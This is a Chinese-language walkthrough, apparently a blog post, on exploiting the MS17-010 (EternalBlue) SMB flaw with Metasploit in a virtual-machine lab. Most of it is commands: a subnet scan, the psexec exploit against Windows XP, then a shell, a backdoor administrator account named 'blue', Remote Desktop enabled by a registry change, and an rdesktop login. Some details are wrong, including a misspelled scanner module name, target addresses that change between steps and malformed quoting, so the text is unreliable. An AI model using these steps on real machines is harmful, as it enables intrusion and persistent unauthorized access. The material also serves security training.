Metasploit之MS17-010远程执行代码漏洞利用过程

永恒之蓝是指2017年4月14日晚，黑客团体Shadow Brokers（影子经纪人）公布一大批网络攻击工具，其中包含“永恒之蓝”工具，“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。主要是攻击445文件共享端口的Windows机器，无需用户任何操作，只要开机上网，不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序


Metasploit是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。
此次采用kali Linux系统集成的metasploit进行测试验证MS17-010（永恒之蓝，著名比特币勒索漏洞）。实验环境均采用虚拟机。



Ms17-010攻击模块
exploit/windows/smb/ms17_010_eternalblue （window2008、 windows7、windows8.1、 Windows Server2012 Datacenter 9200）
exploit/windows/smb/ms17_010_psexec （windows2003、window xp 、windows2012）

扫描当前内网是否有存在ms17010的漏洞主机
use auxiliary/scanner/smb/smb_ms71_010
set rhosts 192.168.2.1-254
exploit

攻击WINXP
use exploit/windows/smb/ms17_010_psexec
set RHOST 192.168.2.245
run


进一步渗透：
进入shell：
shell
创建一个名叫blue的用户：
net user blue blue /add  
将用户blue添加入管理组  ：

net localgroup administrators blue /add
开启远程桌面功能  ：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

Kali远程桌面连接Windows

rdesktop 172.16.70.199:3389